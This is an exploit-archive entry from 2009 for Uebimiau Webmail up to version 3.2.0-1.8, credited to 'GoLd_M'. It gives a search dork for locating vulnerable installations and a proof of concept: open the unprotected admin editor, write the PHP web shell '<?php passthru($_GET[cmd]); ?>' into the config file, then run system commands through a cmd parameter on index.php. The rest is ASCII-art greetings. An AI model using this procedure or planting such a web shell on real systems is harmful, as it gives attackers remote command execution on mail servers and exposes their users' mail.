[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
# Published : 2009-06-12
# Author : GoLd_M
# Previous Title : TransLucid 1.75 Multiple Remote Vulnerabilities
# Next Title : phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln


Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
     /uebimiau/admin/editor.php?load=config
And You Can Write Any Code As 
<?php passthru($_GET[cmd]); ?> After That Click {Write To File}
Go 
     /uebimiau/index.php?cmd=id
See Pic :http://www.almlf.com/get-6-2009-almlf_com_akszizl2.png
                               Thanx To 
         .___________..______     ____    ____  ___       _______ 
         |           ||   _           /   / /        /  _____|
         `---|  |----`|  |_)  |       /   / /  ^     |  |  __  
             |  |     |      /      _    _/ /  /_    |  | |_ | 
             |  |     |  |  ----.   |  |  /  _____   |  |__| | 
             |__|     | _| `._____|   |__| /__/     __ ______| 
                                                         
     ___       ______     ___       _______   _______ .___  ___. ____    ____ 
    /        /      |   /        |        |   ____||   /   |      /   / 
   /  ^     |  ,----'  /  ^      |  .--.  ||  |__   |    /  |     /   /  
  /  /_    |  |      /  /_     |  |  |  ||   __|  |  |/|  |   _    _/   
 /  _____   |  `----./  _____    |  '--'  ||  |____ |  |  |  |     |  |     
/__/     __ ______/__/     __ |_______/ |_______||__|  |__|     |__|     

# www.Syue.com [2009-06-12]